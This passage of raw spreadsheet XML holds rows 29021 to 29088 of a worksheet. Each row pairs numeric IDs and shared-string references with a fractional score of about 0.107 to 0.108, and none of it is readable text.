        <v>5.0966078E7</v>
      </c>
      <c r="C29021" s="2" t="s">
        <v>27898</v>
      </c>
      <c r="D29021" s="2">
        <v>1.0</v>
      </c>
      <c r="E29021" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29021" s="2">
        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="29022" ht="15.75" customHeight="1">
      <c r="A29022" s="1">
        <v>13086.0</v>
      </c>
      <c r="B29022" s="2">
        <v>3.3367446E7</v>
      </c>
      <c r="C29022" s="2" t="s">
        <v>27899</v>
      </c>
      <c r="D29022" s="2">
        <v>1.0</v>
      </c>
      <c r="E29022" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29022" s="2">
        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="29023" ht="15.75" customHeight="1">
      <c r="A29023" s="1">
        <v>13672.0</v>
      </c>
      <c r="B29023" s="2">
        <v>3.6018025E7</v>
      </c>
      <c r="C29023" s="2" t="s">
        <v>27900</v>
      </c>
      <c r="D29023" s="2">
        <v>1.0</v>
      </c>
      <c r="E29023" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29023" s="2">
        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="29024" ht="15.75" customHeight="1">
      <c r="A29024" s="1">
        <v>14472.0</v>
      </c>
      <c r="B29024" s="2">
        <v>3.9520399E7</v>
      </c>
      <c r="C29024" s="2" t="s">
        <v>27901</v>
      </c>
      <c r="D29024" s="2">
        <v>1.0</v>
      </c>
      <c r="E29024" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29024" s="2">
        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="29025" ht="15.75" customHeight="1">
      <c r="A29025" s="1">
        <v>16899.0</v>
      </c>
      <c r="B29025" s="2">
        <v>4.8084298E7</v>
      </c>
      <c r="C29025" s="2" t="s">
        <v>27902</v>
      </c>
      <c r="D29025" s="2">
        <v>1.0</v>
      </c>
      <c r="E29025" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29025" s="2">
        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="29026" ht="15.75" customHeight="1">
      <c r="A29026" s="1">
        <v>18398.0</v>
      </c>
      <c r="B29026" s="2">
        <v>5.262274E7</v>
      </c>
      <c r="C29026" s="2" t="s">
        <v>27903</v>
      </c>
      <c r="D29026" s="2">
        <v>1.0</v>
      </c>
      <c r="E29026" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29026" s="2">
        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="29027" ht="15.75" customHeight="1">
      <c r="A29027" s="1">
        <v>18738.0</v>
      </c>
      <c r="B29027" s="2">
        <v>5.3732359E7</v>
      </c>
      <c r="C29027" s="2" t="s">
        <v>27904</v>
      </c>
      <c r="D29027" s="2">
        <v>1.0</v>
      </c>
      <c r="E29027" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29027" s="2">
        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="29028" ht="15.75" customHeight="1">
      <c r="A29028" s="1">
        <v>19225.0</v>
      </c>
      <c r="B29028" s="2">
        <v>5.5042459E7</v>
      </c>
      <c r="C29028" s="2" t="s">
        <v>27905</v>
      </c>
      <c r="D29028" s="2">
        <v>1.0</v>
      </c>
      <c r="E29028" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29028" s="2">
        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="29029" ht="15.75" customHeight="1">
      <c r="A29029" s="1">
        <v>20829.0</v>
      </c>
      <c r="B29029" s="2">
        <v>1.5476191E7</v>
      </c>
      <c r="C29029" s="2" t="s">
        <v>6578</v>
      </c>
      <c r="D29029" s="2">
        <v>1.0</v>
      </c>
      <c r="E29029" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29029" s="2">
        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="29030" ht="15.75" customHeight="1">
      <c r="A29030" s="1">
        <v>21009.0</v>
      </c>
      <c r="B29030" s="2">
        <v>1.7249511E7</v>
      </c>
      <c r="C29030" s="2" t="s">
        <v>27906</v>
      </c>
      <c r="D29030" s="2">
        <v>1.0</v>
      </c>
      <c r="E29030" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29030" s="2">
        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="29031" ht="15.75" customHeight="1">
      <c r="A29031" s="1">
        <v>21937.0</v>
      </c>
      <c r="B29031" s="2">
        <v>2.8669118E7</v>
      </c>
      <c r="C29031" s="2" t="s">
        <v>27907</v>
      </c>
      <c r="D29031" s="2">
        <v>1.0</v>
      </c>
      <c r="E29031" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29031" s="2">
        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="29032" ht="15.75" customHeight="1">
      <c r="A29032" s="1">
        <v>26942.0</v>
      </c>
      <c r="B29032" s="2">
        <v>1.9556762E7</v>
      </c>
      <c r="C29032" s="2" t="s">
        <v>27908</v>
      </c>
      <c r="D29032" s="2">
        <v>1.0</v>
      </c>
      <c r="E29032" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29032" s="2">
        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="29033" ht="15.75" customHeight="1">
      <c r="A29033" s="1">
        <v>30602.0</v>
      </c>
      <c r="B29033" s="2">
        <v>4133664.0</v>
      </c>
      <c r="C29033" s="2" t="s">
        <v>27909</v>
      </c>
      <c r="D29033" s="2">
        <v>1.0</v>
      </c>
      <c r="E29033" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29033" s="2">
        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="29034" ht="15.75" customHeight="1">
      <c r="A29034" s="1">
        <v>31640.0</v>
      </c>
      <c r="B29034" s="2">
        <v>5147249.0</v>
      </c>
      <c r="C29034" s="2" t="s">
        <v>27910</v>
      </c>
      <c r="D29034" s="2">
        <v>1.0</v>
      </c>
      <c r="E29034" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29034" s="2">
        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="29035" ht="15.75" customHeight="1">
      <c r="A29035" s="1">
        <v>32192.0</v>
      </c>
      <c r="B29035" s="2">
        <v>5474638.0</v>
      </c>
      <c r="C29035" s="2" t="s">
        <v>27911</v>
      </c>
      <c r="D29035" s="2">
        <v>1.0</v>
      </c>
      <c r="E29035" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29035" s="2">
        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="29036" ht="15.75" customHeight="1">
      <c r="A29036" s="1">
        <v>33048.0</v>
      </c>
      <c r="B29036" s="2">
        <v>6775429.0</v>
      </c>
      <c r="C29036" s="2" t="s">
        <v>27912</v>
      </c>
      <c r="D29036" s="2">
        <v>1.0</v>
      </c>
      <c r="E29036" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29036" s="2">
        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="29037" ht="15.75" customHeight="1">
      <c r="A29037" s="1">
        <v>6053.0</v>
      </c>
      <c r="B29037" s="2">
        <v>4.7608542E7</v>
      </c>
      <c r="C29037" s="2" t="s">
        <v>27913</v>
      </c>
      <c r="D29037" s="2">
        <v>1.0</v>
      </c>
      <c r="E29037" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29037" s="2">
        <v>0.1080808080808081</v>
      </c>
    </row>
    <row r="29038" ht="15.75" customHeight="1">
      <c r="A29038" s="1">
        <v>6928.0</v>
      </c>
      <c r="B29038" s="2">
        <v>4.9878604E7</v>
      </c>
      <c r="C29038" s="2" t="s">
        <v>27914</v>
      </c>
      <c r="D29038" s="2">
        <v>1.0</v>
      </c>
      <c r="E29038" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29038" s="2">
        <v>0.1080808080808081</v>
      </c>
    </row>
    <row r="29039" ht="15.75" customHeight="1">
      <c r="A29039" s="1">
        <v>7159.0</v>
      </c>
      <c r="B29039" s="2">
        <v>5.0489448E7</v>
      </c>
      <c r="C29039" s="2" t="s">
        <v>27915</v>
      </c>
      <c r="D29039" s="2">
        <v>1.0</v>
      </c>
      <c r="E29039" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29039" s="2">
        <v>0.1080808080808081</v>
      </c>
    </row>
    <row r="29040" ht="15.75" customHeight="1">
      <c r="A29040" s="1">
        <v>8279.0</v>
      </c>
      <c r="B29040" s="2">
        <v>5.3469505E7</v>
      </c>
      <c r="C29040" s="2" t="s">
        <v>27916</v>
      </c>
      <c r="D29040" s="2">
        <v>1.0</v>
      </c>
      <c r="E29040" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29040" s="2">
        <v>0.1080808080808081</v>
      </c>
    </row>
    <row r="29041" ht="15.75" customHeight="1">
      <c r="A29041" s="1">
        <v>8402.0</v>
      </c>
      <c r="B29041" s="2">
        <v>5.3875362E7</v>
      </c>
      <c r="C29041" s="2" t="s">
        <v>27917</v>
      </c>
      <c r="D29041" s="2">
        <v>1.0</v>
      </c>
      <c r="E29041" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29041" s="2">
        <v>0.1080808080808081</v>
      </c>
    </row>
    <row r="29042" ht="15.75" customHeight="1">
      <c r="A29042" s="1">
        <v>9856.0</v>
      </c>
      <c r="B29042" s="2">
        <v>5.6709687E7</v>
      </c>
      <c r="C29042" s="2" t="s">
        <v>27918</v>
      </c>
      <c r="D29042" s="2">
        <v>1.0</v>
      </c>
      <c r="E29042" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29042" s="2">
        <v>0.1080808080808081</v>
      </c>
    </row>
    <row r="29043" ht="15.75" customHeight="1">
      <c r="A29043" s="1">
        <v>9897.0</v>
      </c>
      <c r="B29043" s="2">
        <v>5.6770536E7</v>
      </c>
      <c r="C29043" s="2" t="s">
        <v>27919</v>
      </c>
      <c r="D29043" s="2">
        <v>1.0</v>
      </c>
      <c r="E29043" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29043" s="2">
        <v>0.1080808080808081</v>
      </c>
    </row>
    <row r="29044" ht="15.75" customHeight="1">
      <c r="A29044" s="1">
        <v>11021.0</v>
      </c>
      <c r="B29044" s="2">
        <v>1.7871454E7</v>
      </c>
      <c r="C29044" s="2" t="s">
        <v>27920</v>
      </c>
      <c r="D29044" s="2">
        <v>1.0</v>
      </c>
      <c r="E29044" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29044" s="2">
        <v>0.1080808080808081</v>
      </c>
    </row>
    <row r="29045" ht="15.75" customHeight="1">
      <c r="A29045" s="1">
        <v>13897.0</v>
      </c>
      <c r="B29045" s="2">
        <v>3.703677E7</v>
      </c>
      <c r="C29045" s="2" t="s">
        <v>27921</v>
      </c>
      <c r="D29045" s="2">
        <v>1.0</v>
      </c>
      <c r="E29045" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29045" s="2">
        <v>0.1080808080808081</v>
      </c>
    </row>
    <row r="29046" ht="15.75" customHeight="1">
      <c r="A29046" s="1">
        <v>14068.0</v>
      </c>
      <c r="B29046" s="2">
        <v>3.7603038E7</v>
      </c>
      <c r="C29046" s="2" t="s">
        <v>27922</v>
      </c>
      <c r="D29046" s="2">
        <v>1.0</v>
      </c>
      <c r="E29046" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29046" s="2">
        <v>0.1080808080808081</v>
      </c>
    </row>
    <row r="29047" ht="15.75" customHeight="1">
      <c r="A29047" s="1">
        <v>14579.0</v>
      </c>
      <c r="B29047" s="2">
        <v>4.0107498E7</v>
      </c>
      <c r="C29047" s="2" t="s">
        <v>27923</v>
      </c>
      <c r="D29047" s="2">
        <v>1.0</v>
      </c>
      <c r="E29047" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29047" s="2">
        <v>0.1080808080808081</v>
      </c>
    </row>
    <row r="29048" ht="15.75" customHeight="1">
      <c r="A29048" s="1">
        <v>19344.0</v>
      </c>
      <c r="B29048" s="2">
        <v>5.5362217E7</v>
      </c>
      <c r="C29048" s="2" t="s">
        <v>27924</v>
      </c>
      <c r="D29048" s="2">
        <v>1.0</v>
      </c>
      <c r="E29048" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29048" s="2">
        <v>0.1080808080808081</v>
      </c>
    </row>
    <row r="29049" ht="15.75" customHeight="1">
      <c r="A29049" s="1">
        <v>19473.0</v>
      </c>
      <c r="B29049" s="2">
        <v>5.5830252E7</v>
      </c>
      <c r="C29049" s="2" t="s">
        <v>27925</v>
      </c>
      <c r="D29049" s="2">
        <v>1.0</v>
      </c>
      <c r="E29049" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29049" s="2">
        <v>0.1080808080808081</v>
      </c>
    </row>
    <row r="29050" ht="15.75" customHeight="1">
      <c r="A29050" s="1">
        <v>19886.0</v>
      </c>
      <c r="B29050" s="2">
        <v>5.7258982E7</v>
      </c>
      <c r="C29050" s="2" t="s">
        <v>27926</v>
      </c>
      <c r="D29050" s="2">
        <v>1.0</v>
      </c>
      <c r="E29050" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29050" s="2">
        <v>0.1080808080808081</v>
      </c>
    </row>
    <row r="29051" ht="15.75" customHeight="1">
      <c r="A29051" s="1">
        <v>20626.0</v>
      </c>
      <c r="B29051" s="2">
        <v>1.4092649E7</v>
      </c>
      <c r="C29051" s="2" t="s">
        <v>27927</v>
      </c>
      <c r="D29051" s="2">
        <v>1.0</v>
      </c>
      <c r="E29051" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29051" s="2">
        <v>0.1080808080808081</v>
      </c>
    </row>
    <row r="29052" ht="15.75" customHeight="1">
      <c r="A29052" s="1">
        <v>26095.0</v>
      </c>
      <c r="B29052" s="2">
        <v>1.56995E7</v>
      </c>
      <c r="C29052" s="2" t="s">
        <v>27928</v>
      </c>
      <c r="D29052" s="2">
        <v>1.0</v>
      </c>
      <c r="E29052" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29052" s="2">
        <v>0.1080808080808081</v>
      </c>
    </row>
    <row r="29053" ht="15.75" customHeight="1">
      <c r="A29053" s="1">
        <v>26586.0</v>
      </c>
      <c r="B29053" s="2">
        <v>1.7943354E7</v>
      </c>
      <c r="C29053" s="2" t="s">
        <v>27929</v>
      </c>
      <c r="D29053" s="2">
        <v>1.0</v>
      </c>
      <c r="E29053" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29053" s="2">
        <v>0.1080808080808081</v>
      </c>
    </row>
    <row r="29054" ht="15.75" customHeight="1">
      <c r="A29054" s="1">
        <v>31479.0</v>
      </c>
      <c r="B29054" s="2">
        <v>5048683.0</v>
      </c>
      <c r="C29054" s="2" t="s">
        <v>27930</v>
      </c>
      <c r="D29054" s="2">
        <v>1.0</v>
      </c>
      <c r="E29054" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29054" s="2">
        <v>0.1080808080808081</v>
      </c>
    </row>
    <row r="29055" ht="15.75" customHeight="1">
      <c r="A29055" s="1">
        <v>33891.0</v>
      </c>
      <c r="B29055" s="2">
        <v>9177365.0</v>
      </c>
      <c r="C29055" s="2" t="s">
        <v>27931</v>
      </c>
      <c r="D29055" s="2">
        <v>1.0</v>
      </c>
      <c r="E29055" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29055" s="2">
        <v>0.1080808080808081</v>
      </c>
    </row>
    <row r="29056" ht="15.75" customHeight="1">
      <c r="A29056" s="1">
        <v>10412.0</v>
      </c>
      <c r="B29056" s="2">
        <v>9901766.0</v>
      </c>
      <c r="C29056" s="2" t="s">
        <v>27932</v>
      </c>
      <c r="D29056" s="2">
        <v>1.0</v>
      </c>
      <c r="E29056" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29056" s="2">
        <v>0.108080808080808</v>
      </c>
    </row>
    <row r="29057" ht="15.75" customHeight="1">
      <c r="A29057" s="1">
        <v>1565.0</v>
      </c>
      <c r="B29057" s="2">
        <v>2.7652105E7</v>
      </c>
      <c r="C29057" s="2" t="s">
        <v>27933</v>
      </c>
      <c r="D29057" s="2">
        <v>1.0</v>
      </c>
      <c r="E29057" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29057" s="2">
        <v>0.1080246913580247</v>
      </c>
    </row>
    <row r="29058" ht="15.75" customHeight="1">
      <c r="A29058" s="1">
        <v>2597.0</v>
      </c>
      <c r="B29058" s="2">
        <v>3.4372156E7</v>
      </c>
      <c r="C29058" s="2" t="s">
        <v>27934</v>
      </c>
      <c r="D29058" s="2">
        <v>1.0</v>
      </c>
      <c r="E29058" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29058" s="2">
        <v>0.1080246913580247</v>
      </c>
    </row>
    <row r="29059" ht="15.75" customHeight="1">
      <c r="A29059" s="1">
        <v>2873.0</v>
      </c>
      <c r="B29059" s="2">
        <v>3.5610022E7</v>
      </c>
      <c r="C29059" s="2" t="s">
        <v>27935</v>
      </c>
      <c r="D29059" s="2">
        <v>1.0</v>
      </c>
      <c r="E29059" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29059" s="2">
        <v>0.1080246913580247</v>
      </c>
    </row>
    <row r="29060" ht="15.75" customHeight="1">
      <c r="A29060" s="1">
        <v>6953.0</v>
      </c>
      <c r="B29060" s="2">
        <v>4.9970235E7</v>
      </c>
      <c r="C29060" s="2" t="s">
        <v>27936</v>
      </c>
      <c r="D29060" s="2">
        <v>1.0</v>
      </c>
      <c r="E29060" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29060" s="2">
        <v>0.1080246913580247</v>
      </c>
    </row>
    <row r="29061" ht="15.75" customHeight="1">
      <c r="A29061" s="1">
        <v>8735.0</v>
      </c>
      <c r="B29061" s="2">
        <v>5.4527668E7</v>
      </c>
      <c r="C29061" s="2" t="s">
        <v>27937</v>
      </c>
      <c r="D29061" s="2">
        <v>1.0</v>
      </c>
      <c r="E29061" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29061" s="2">
        <v>0.1080246913580247</v>
      </c>
    </row>
    <row r="29062" ht="15.75" customHeight="1">
      <c r="A29062" s="1">
        <v>12853.0</v>
      </c>
      <c r="B29062" s="2">
        <v>3.1811462E7</v>
      </c>
      <c r="C29062" s="2" t="s">
        <v>27938</v>
      </c>
      <c r="D29062" s="2">
        <v>1.0</v>
      </c>
      <c r="E29062" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29062" s="2">
        <v>0.1080246913580247</v>
      </c>
    </row>
    <row r="29063" ht="15.75" customHeight="1">
      <c r="A29063" s="1">
        <v>13010.0</v>
      </c>
      <c r="B29063" s="2">
        <v>3.2869936E7</v>
      </c>
      <c r="C29063" s="2" t="s">
        <v>27939</v>
      </c>
      <c r="D29063" s="2">
        <v>1.0</v>
      </c>
      <c r="E29063" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29063" s="2">
        <v>0.1080246913580247</v>
      </c>
    </row>
    <row r="29064" ht="15.75" customHeight="1">
      <c r="A29064" s="1">
        <v>17422.0</v>
      </c>
      <c r="B29064" s="2">
        <v>4.970763E7</v>
      </c>
      <c r="C29064" s="2" t="s">
        <v>27940</v>
      </c>
      <c r="D29064" s="2">
        <v>1.0</v>
      </c>
      <c r="E29064" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29064" s="2">
        <v>0.1080246913580247</v>
      </c>
    </row>
    <row r="29065" ht="15.75" customHeight="1">
      <c r="A29065" s="1">
        <v>17908.0</v>
      </c>
      <c r="B29065" s="2">
        <v>5.1108539E7</v>
      </c>
      <c r="C29065" s="2" t="s">
        <v>27941</v>
      </c>
      <c r="D29065" s="2">
        <v>1.0</v>
      </c>
      <c r="E29065" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29065" s="2">
        <v>0.1080246913580247</v>
      </c>
    </row>
    <row r="29066" ht="15.75" customHeight="1">
      <c r="A29066" s="1">
        <v>18474.0</v>
      </c>
      <c r="B29066" s="2">
        <v>5.2854217E7</v>
      </c>
      <c r="C29066" s="2" t="s">
        <v>27942</v>
      </c>
      <c r="D29066" s="2">
        <v>1.0</v>
      </c>
      <c r="E29066" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29066" s="2">
        <v>0.1080246913580247</v>
      </c>
    </row>
    <row r="29067" ht="15.75" customHeight="1">
      <c r="A29067" s="1">
        <v>20810.0</v>
      </c>
      <c r="B29067" s="2">
        <v>1.5330106E7</v>
      </c>
      <c r="C29067" s="2" t="s">
        <v>27943</v>
      </c>
      <c r="D29067" s="2">
        <v>1.0</v>
      </c>
      <c r="E29067" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29067" s="2">
        <v>0.1080246913580247</v>
      </c>
    </row>
    <row r="29068" ht="15.75" customHeight="1">
      <c r="A29068" s="1">
        <v>34204.0</v>
      </c>
      <c r="B29068" s="2">
        <v>2.168983E7</v>
      </c>
      <c r="C29068" s="2" t="s">
        <v>27944</v>
      </c>
      <c r="D29068" s="2">
        <v>1.0</v>
      </c>
      <c r="E29068" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29068" s="2">
        <v>0.1080246913580247</v>
      </c>
    </row>
    <row r="29069" ht="15.75" customHeight="1">
      <c r="A29069" s="1">
        <v>2415.0</v>
      </c>
      <c r="B29069" s="2">
        <v>3.3518745E7</v>
      </c>
      <c r="C29069" s="2" t="s">
        <v>27945</v>
      </c>
      <c r="D29069" s="2">
        <v>1.0</v>
      </c>
      <c r="E29069" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29069" s="2">
        <v>0.1079664570230608</v>
      </c>
    </row>
    <row r="29070" ht="15.75" customHeight="1">
      <c r="A29070" s="1">
        <v>3394.0</v>
      </c>
      <c r="B29070" s="2">
        <v>3.7994666E7</v>
      </c>
      <c r="C29070" s="2" t="s">
        <v>27946</v>
      </c>
      <c r="D29070" s="2">
        <v>1.0</v>
      </c>
      <c r="E29070" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29070" s="2">
        <v>0.1079664570230608</v>
      </c>
    </row>
    <row r="29071" ht="15.75" customHeight="1">
      <c r="A29071" s="1">
        <v>5142.0</v>
      </c>
      <c r="B29071" s="2">
        <v>4.4645562E7</v>
      </c>
      <c r="C29071" s="2" t="s">
        <v>27947</v>
      </c>
      <c r="D29071" s="2">
        <v>1.0</v>
      </c>
      <c r="E29071" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29071" s="2">
        <v>0.1079664570230608</v>
      </c>
    </row>
    <row r="29072" ht="15.75" customHeight="1">
      <c r="A29072" s="1">
        <v>5250.0</v>
      </c>
      <c r="B29072" s="2">
        <v>4.5090308E7</v>
      </c>
      <c r="C29072" s="2" t="s">
        <v>27948</v>
      </c>
      <c r="D29072" s="2">
        <v>1.0</v>
      </c>
      <c r="E29072" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29072" s="2">
        <v>0.1079664570230608</v>
      </c>
    </row>
    <row r="29073" ht="15.75" customHeight="1">
      <c r="A29073" s="1">
        <v>6123.0</v>
      </c>
      <c r="B29073" s="2">
        <v>4.7783372E7</v>
      </c>
      <c r="C29073" s="2" t="s">
        <v>27949</v>
      </c>
      <c r="D29073" s="2">
        <v>1.0</v>
      </c>
      <c r="E29073" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29073" s="2">
        <v>0.1079664570230608</v>
      </c>
    </row>
    <row r="29074" ht="15.75" customHeight="1">
      <c r="A29074" s="1">
        <v>12510.0</v>
      </c>
      <c r="B29074" s="2">
        <v>2.9641394E7</v>
      </c>
      <c r="C29074" s="2" t="s">
        <v>27950</v>
      </c>
      <c r="D29074" s="2">
        <v>1.0</v>
      </c>
      <c r="E29074" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29074" s="2">
        <v>0.1079664570230608</v>
      </c>
    </row>
    <row r="29075" ht="15.75" customHeight="1">
      <c r="A29075" s="1">
        <v>16151.0</v>
      </c>
      <c r="B29075" s="2">
        <v>4.5577183E7</v>
      </c>
      <c r="C29075" s="2" t="s">
        <v>27951</v>
      </c>
      <c r="D29075" s="2">
        <v>1.0</v>
      </c>
      <c r="E29075" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29075" s="2">
        <v>0.1079664570230608</v>
      </c>
    </row>
    <row r="29076" ht="15.75" customHeight="1">
      <c r="A29076" s="1">
        <v>16773.0</v>
      </c>
      <c r="B29076" s="2">
        <v>4.7685143E7</v>
      </c>
      <c r="C29076" s="2" t="s">
        <v>27952</v>
      </c>
      <c r="D29076" s="2">
        <v>1.0</v>
      </c>
      <c r="E29076" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29076" s="2">
        <v>0.1079664570230608</v>
      </c>
    </row>
    <row r="29077" ht="15.75" customHeight="1">
      <c r="A29077" s="1">
        <v>19669.0</v>
      </c>
      <c r="B29077" s="2">
        <v>5.6372403E7</v>
      </c>
      <c r="C29077" s="2" t="s">
        <v>27953</v>
      </c>
      <c r="D29077" s="2">
        <v>1.0</v>
      </c>
      <c r="E29077" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29077" s="2">
        <v>0.1079664570230608</v>
      </c>
    </row>
    <row r="29078" ht="15.75" customHeight="1">
      <c r="A29078" s="1">
        <v>2662.0</v>
      </c>
      <c r="B29078" s="2">
        <v>3.4705213E7</v>
      </c>
      <c r="C29078" s="2" t="s">
        <v>27954</v>
      </c>
      <c r="D29078" s="2">
        <v>1.0</v>
      </c>
      <c r="E29078" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29078" s="2">
        <v>0.1079059829059829</v>
      </c>
    </row>
    <row r="29079" ht="15.75" customHeight="1">
      <c r="A29079" s="1">
        <v>8301.0</v>
      </c>
      <c r="B29079" s="2">
        <v>5.3561366E7</v>
      </c>
      <c r="C29079" s="2" t="s">
        <v>27955</v>
      </c>
      <c r="D29079" s="2">
        <v>1.0</v>
      </c>
      <c r="E29079" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29079" s="2">
        <v>0.1079059829059829</v>
      </c>
    </row>
    <row r="29080" ht="15.75" customHeight="1">
      <c r="A29080" s="1">
        <v>20897.0</v>
      </c>
      <c r="B29080" s="2">
        <v>1.6231317E7</v>
      </c>
      <c r="C29080" s="2" t="s">
        <v>27956</v>
      </c>
      <c r="D29080" s="2">
        <v>1.0</v>
      </c>
      <c r="E29080" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29080" s="2">
        <v>0.1079059829059829</v>
      </c>
    </row>
    <row r="29081" ht="15.75" customHeight="1">
      <c r="A29081" s="1">
        <v>6707.0</v>
      </c>
      <c r="B29081" s="2">
        <v>4.9235277E7</v>
      </c>
      <c r="C29081" s="2" t="s">
        <v>27957</v>
      </c>
      <c r="D29081" s="2">
        <v>1.0</v>
      </c>
      <c r="E29081" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29081" s="2">
        <v>0.1069651741293532</v>
      </c>
    </row>
    <row r="29082" ht="15.75" customHeight="1">
      <c r="A29082" s="1">
        <v>30156.0</v>
      </c>
      <c r="B29082" s="2">
        <v>3.704565E7</v>
      </c>
      <c r="C29082" s="2" t="s">
        <v>27958</v>
      </c>
      <c r="D29082" s="2">
        <v>1.0</v>
      </c>
      <c r="E29082" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29082" s="2">
        <v>0.1067019400352733</v>
      </c>
    </row>
    <row r="29083" ht="15.75" customHeight="1">
      <c r="A29083" s="1">
        <v>4436.0</v>
      </c>
      <c r="B29083" s="2">
        <v>4.2351597E7</v>
      </c>
      <c r="C29083" s="2" t="s">
        <v>27959</v>
      </c>
      <c r="D29083" s="2">
        <v>1.0</v>
      </c>
      <c r="E29083" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29083" s="2">
        <v>0.1066308243727599</v>
      </c>
    </row>
    <row r="29084" ht="15.75" customHeight="1">
      <c r="A29084" s="1">
        <v>15806.0</v>
      </c>
      <c r="B29084" s="2">
        <v>4.4232862E7</v>
      </c>
      <c r="C29084" s="2" t="s">
        <v>27960</v>
      </c>
      <c r="D29084" s="2">
        <v>1.0</v>
      </c>
      <c r="E29084" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29084" s="2">
        <v>0.1066308243727598</v>
      </c>
    </row>
    <row r="29085" ht="15.75" customHeight="1">
      <c r="A29085" s="1">
        <v>12597.0</v>
      </c>
      <c r="B29085" s="2">
        <v>3.0073381E7</v>
      </c>
      <c r="C29085" s="2" t="s">
        <v>27961</v>
      </c>
      <c r="D29085" s="2">
        <v>1.0</v>
      </c>
      <c r="E29085" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29085" s="2">
        <v>0.1065573770491803</v>
      </c>
    </row>
    <row r="29086" ht="15.75" customHeight="1">
      <c r="A29086" s="1">
        <v>24983.0</v>
      </c>
      <c r="B29086" s="2">
        <v>1.2685758E7</v>
      </c>
      <c r="C29086" s="2" t="s">
        <v>27962</v>
      </c>
      <c r="D29086" s="2">
        <v>1.0</v>
      </c>
      <c r="E29086" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29086" s="2">
        <v>0.1065573770491803</v>
      </c>
    </row>
    <row r="29087" ht="15.75" customHeight="1">
      <c r="A29087" s="1">
        <v>27069.0</v>
      </c>
      <c r="B29087" s="2">
        <v>2.0421752E7</v>
      </c>
      <c r="C29087" s="2" t="s">
        <v>27963</v>
      </c>
      <c r="D29087" s="2">
        <v>1.0</v>
      </c>
      <c r="E29087" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29087" s="2">
        <v>0.1064814814814815</v>
      </c>
    </row>
    <row r="29088" ht="15.75" customHeight="1">
      <c r="A29088" s="1">
        <v>28885.0</v>
      </c>
      <c r="B29088" s="2">
